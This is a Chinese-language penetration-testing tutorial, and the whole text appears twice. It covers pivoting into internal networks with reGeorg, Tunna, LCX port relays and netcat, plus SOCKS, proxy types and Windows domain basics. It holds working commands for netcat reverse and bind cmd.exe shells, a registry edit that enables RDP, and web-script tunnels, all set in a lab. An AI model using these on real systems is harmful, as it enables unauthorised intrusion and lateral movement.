内网渗透 / 转发代理
字数 2170 2025-08-18 11:36:36

内网渗透与转发代理技术详解

0x01 内网转发基础概念

内网转发是指在渗透测试过程中,通过端口转发或设置代理服务器,使攻击机能够访问和操作内网中其他不可直接访问的机器。

端口映射

  • 将内网(LAN)IP地址映射成公网(WAN)IP地址
  • 用户访问映射端口时,请求被转移到内网特定服务主机

0x02 Socket协议与Socks协议

Socket协议

  • 计算机之间通信的约定或方式
  • 通过Socket可以实现计算机间的数据收发

Socks协议

  • 会话层代理协议
  • 设计目的:帮助授权用户突破防火墙限制
  • 主要版本:Socks4和Socks5

协议过程

  1. 客户端连接代理服务器并发送协议版本和支持的认证方式
  2. 代理服务器返回认证方式
  3. 若无需认证,客户端直接发起真实请求
  4. 代理服务器连接目标服务器
  5. 代理服务器转发客户端与目标服务器间的流量

0x03 代理类型

正向代理

  • 客户端代理,服务端不知道实际请求的客户端
  • 模式:Lhost → proxy → Rhost
  • 用途:
    • 访问受限资源
    • 缓存加速
    • 隐藏用户信息

反向代理

  • 服务器端代理,客户端不知道实际服务提供者
  • 模式:Lhost ↔ proxy ↔ firewall ↔ Rhost
  • 用途:
    • 保证内网安全
    • 防止Web攻击
    • 实现负载均衡

0x04 内网代理转发技术

实验环境

  • 攻击机器:192.168.13.128
  • 外网服务器(含内网网卡):192.168.13.129/192.168.142.130
  • 内网服务器:192.168.142.128

1. reGeorg + Proxifier 正向代理

reGeorg特点

  • reDuh的继承者
  • 利用Socks5协议
  • 支持PHP/ASP/JSP/ASPX脚本

使用步骤

  1. 上传reGeorg脚本到外网服务器
  2. 访问脚本验证运行状态("Georg says, 'All seems fine'")
  3. 本地监听端口:python2 reGeorgSocksProxy.py -p 8080 -u http://192.168.66.131/tunnel.nosocket.php
  4. 配置Proxifier:
    • 添加本地代理服务器(监听端口)
    • 配置代理规则
    • 设置特定程序使用Socks5代理

2. Tunna 正向代理

功能

  • 通过HTTP封装隧道通信任何TCP
  • 绕过防火墙网络限制

常用参数

  • -u 远程代理脚本地址
  • -l 本地监听端口
  • -r 远程映射端口
  • -v 输出详细数据
  • -a 代理远程连接的主机地址

使用步骤

  1. 在外网服务器WEB目录放入Tunna工具
  2. 攻击机执行命令映射端口:python proxy.py -u http://192.168.13.129/conn.php -l 5555 -a 192.168.142.128 -r 3389 -v

3. LCX端口转发

功能

  1. 本地端口转发到远程主机端口
  2. 本地端口转发到本地另一端口
  3. 监听并转发

使用场景

  • 被控计算机处于内网时
  • 需要远程终端管理时

Windows用法

lcx -<listen|tran|slave> <option> [-log logfile]
-tran <等待连接的端口> <目标ip> <目标端口> (端口映射)
-listen <监听slave请求的端口> <等待连接的端口> (端口转发)
-slave <你的ip> <监听端口> <目标ip> <目标端口> (端口转发)

示例

  1. 外网中转服务器:lcx -listen 8888 10000
  2. 内网机器:lcx -slave 192.168.142.130 8888 192.168.142.128 3389
  3. 开启3389端口(Win7/Win2003/XP):REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  4. 连接:rdesktop 192.168.13.129:10000

4. NC反弹CMDshell

正向连接

  • 内网机器:nc -l -p 8888 -t -e cmd.exe
  • 公网机器:nc -nvv 192.168.142.128 8888

反向连接

  • 公网机器:nc -l -p 8888
  • 内网机器:nc -t -e cmd.exe 192.168.142.130 8888

0x05 域基础知识

域(Domain)

  • 将多台计算机逻辑组织到一起进行集中管理
  • Windows网络操作系统的逻辑组织单元
  • 安全边界,有自己的安全策略和信任关系

域控(DC)

  • 域中至少有一台域控制器
  • 保存整个域的用户账号和安全数据库
  • 活动目录(AD)的存储位置

活动目录(AD)

  • Windows Server中的集中式目录管理服务
  • 逻辑结构包含:域、域树、林和组织单元(OU)

工作组(Work Group)

  • 局域网中的计算机逻辑小组
  • "对等式"网络,计算机地位平等
  • 分散管理,每台计算机有自己的SAM数据库

域与工作组的区别

  • 工作组:逻辑集合,各自管理,需要被访问计算机验证
  • 域:安全边界集合,域内已建立信任关系,无需被访问计算机许可

总结

本文详细介绍了内网渗透中的转发代理技术,包括:

  1. 内网转发基础概念
  2. Socket和Socks协议原理
  3. 正向代理与反向代理的区别与应用
  4. 多种内网代理转发工具的使用方法(reGeorg、Tunna、LCX、NC)
  5. 域和工作组的基础知识

这些技术是内网渗透测试中的核心技能,掌握它们对于安全测试人员至关重要。

内网渗透与转发代理技术详解 0x01 内网转发基础概念 内网转发是指在渗透测试过程中,通过端口转发或设置代理服务器,使攻击机能够访问和操作内网中其他不可直接访问的机器。 端口映射 将内网(LAN)IP地址映射成公网(WAN)IP地址 用户访问映射端口时,请求被转移到内网特定服务主机 0x02 Socket协议与Socks协议 Socket协议 计算机之间通信的约定或方式 通过Socket可以实现计算机间的数据收发 Socks协议 会话层代理协议 设计目的:帮助授权用户突破防火墙限制 主要版本:Socks4和Socks5 协议过程 客户端连接代理服务器并发送协议版本和支持的认证方式 代理服务器返回认证方式 若无需认证,客户端直接发起真实请求 代理服务器连接目标服务器 代理服务器转发客户端与目标服务器间的流量 0x03 代理类型 正向代理 客户端代理,服务端不知道实际请求的客户端 模式:Lhost → proxy → Rhost 用途: 访问受限资源 缓存加速 隐藏用户信息 反向代理 服务器端代理,客户端不知道实际服务提供者 模式:Lhost ↔ proxy ↔ firewall ↔ Rhost 用途: 保证内网安全 防止Web攻击 实现负载均衡 0x04 内网代理转发技术 实验环境 攻击机器:192.168.13.128 外网服务器(含内网网卡):192.168.13.129/192.168.142.130 内网服务器:192.168.142.128 1. reGeorg + Proxifier 正向代理 reGeorg特点 : reDuh的继承者 利用Socks5协议 支持PHP/ASP/JSP/ASPX脚本 使用步骤 : 上传reGeorg脚本到外网服务器 访问脚本验证运行状态("Georg says, 'All seems fine'") 本地监听端口: python2 reGeorgSocksProxy.py -p 8080 -u http://192.168.66.131/tunnel.nosocket.php 配置Proxifier: 添加本地代理服务器(监听端口) 配置代理规则 设置特定程序使用Socks5代理 2. Tunna 正向代理 功能 : 通过HTTP封装隧道通信任何TCP 绕过防火墙网络限制 常用参数 : -u 远程代理脚本地址 -l 本地监听端口 -r 远程映射端口 -v 输出详细数据 -a 代理远程连接的主机地址 使用步骤 : 在外网服务器WEB目录放入Tunna工具 攻击机执行命令映射端口: python proxy.py -u http://192.168.13.129/conn.php -l 5555 -a 192.168.142.128 -r 3389 -v 3. LCX端口转发 功能 : 本地端口转发到远程主机端口 本地端口转发到本地另一端口 监听并转发 使用场景 : 被控计算机处于内网时 需要远程终端管理时 Windows用法 : 示例 : 外网中转服务器: lcx -listen 8888 10000 内网机器: lcx -slave 192.168.142.130 8888 192.168.142.128 3389 开启3389端口(Win7/Win2003/XP): REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 连接: rdesktop 192.168.13.129:10000 4. NC反弹CMDshell 正向连接 : 内网机器: nc -l -p 8888 -t -e cmd.exe 公网机器: nc -nvv 192.168.142.128 8888 反向连接 : 公网机器: nc -l -p 8888 内网机器: nc -t -e cmd.exe 192.168.142.130 8888 0x05 域基础知识 域(Domain) 将多台计算机逻辑组织到一起进行集中管理 Windows网络操作系统的逻辑组织单元 安全边界,有自己的安全策略和信任关系 域控(DC) 域中至少有一台域控制器 保存整个域的用户账号和安全数据库 活动目录(AD)的存储位置 活动目录(AD) Windows Server中的集中式目录管理服务 逻辑结构包含:域、域树、林和组织单元(OU) 工作组(Work Group) 局域网中的计算机逻辑小组 "对等式"网络,计算机地位平等 分散管理,每台计算机有自己的SAM数据库 域与工作组的区别 工作组:逻辑集合,各自管理,需要被访问计算机验证 域:安全边界集合,域内已建立信任关系,无需被访问计算机许可 总结 本文详细介绍了内网渗透中的转发代理技术,包括: 内网转发基础概念 Socket和Socks协议原理 正向代理与反向代理的区别与应用 多种内网代理转发工具的使用方法(reGeorg、Tunna、LCX、NC) 域和工作组的基础知识 这些技术是内网渗透测试中的核心技能,掌握它们对于安全测试人员至关重要。